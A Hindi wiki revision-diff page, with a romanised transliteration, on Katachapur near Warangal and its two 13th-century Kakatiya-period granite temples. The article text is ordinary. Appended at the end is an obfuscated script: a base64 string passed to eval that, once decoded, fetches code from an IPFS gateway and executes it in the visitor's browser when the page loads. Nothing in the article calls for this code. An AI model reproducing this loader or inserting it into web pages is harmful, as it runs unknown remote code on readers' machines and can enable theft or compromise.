Difference between revisions of "कटचपुर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "ज़िलें" to "ज़िले")
 
(One intermediate revision by one other user not shown)
Line 1: Line 1:
*कटचपुर [[आंध्र प्रदेश]] राज्य के वारंगल ज़िले के निकट स्थित है।  
+
'''कटचपुर''' [[आंध्र प्रदेश]] राज्य के [[वारंगल ज़िला|वारंगल ज़िले]] के निकट स्थित है।
*कटचपुर [[झील]] के दक्षिणी तट पर 13वीं शती के दो मंदिर हैं जो ककातीय नरेशों के शासन काल में निर्मित हुए थे।  
+
*इनका निर्माण काणाश्म या ग्रेनाइट पत्थर से हुआ है।  
+
*कटचपुर [[झील]] के दक्षिणी तट पर 13वीं [[शती]] के दो मंदिर हैं, जो [[काकतीय साम्राज्य|काकतीय]] नरेशों के शासन काल में निर्मित हुए थे।  
*[[कला]] शैली की दृष्टि से ये मंदिर घनपुर, हनुमकोंडा और रामप्पा के मंदिरों के अनुरूप हैं।  
+
*इन मन्दिरों का निर्माण '''काणाश्म''' या [[ग्रेनाइट|ग्रेनाइट पत्थर]] से हुआ है।  
 +
*[[कला]] शैली की दृष्टि से ये मंदिर [[घनपुर]], '''हनुमकोंडा''' और '''रामप्पा''' के मंदिरों के अनुरूप हैं।  
  
{{संदर्भ ग्रंथ}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 +
*ऐतिहासिक स्थानावली | पृष्ठ संख्या= 126| विजयेन्द्र कुमार माथुर |  वैज्ञानिक तथा तकनीकी शब्दावली आयोग | मानव संसाधन विकास मंत्रालय, भारत सरकार
 +
 
<references/>
 
<references/>
==बाहरी कड़ियाँ==
 
 
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{आंध्र प्रदेश के ऐतिहासिक स्थान}}
 
{{आंध्र प्रदेश के ऐतिहासिक स्थान}}
Line 14: Line 14:
 
[[Category:आंध्र प्रदेश के ऐतिहासिक स्थान]]
 
[[Category:आंध्र प्रदेश के ऐतिहासिक स्थान]]
 
[[Category:ऐतिहासिक स्थान कोश]]
 
[[Category:ऐतिहासिक स्थान कोश]]
[[Category:इतिहास कोश]]
+
[[Category:इतिहास कोश]] [[Category:ऐतिहासिक स्थानावली]]
 +
 
 
__INDEX__
 
__INDEX__

Latest revision as of 12:37, 23 May 2018

katachapur aandhr pradesh rajy ke varangal zile ke nikat sthit hai.

  • katachapur jhil ke dakshini tat par 13vian shati ke do mandir haian, jo kakatiy nareshoan ke shasan kal mean nirmit hue the.
  • in mandiroan ka nirman kanashm ya grenait patthar se hua hai.
  • kala shaili ki drishti se ye mandir ghanapur, hanumakoanda aur ramappa ke mandiroan ke anuroop haian.

tika tippani aur sandarbh

  • aitihasik sthanavali | prishth sankhya= 126| vijayendr kumar mathur | vaijnanik tatha takaniki shabdavali ayog | manav sansadhan vikas mantralay, bharat sarakar


sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>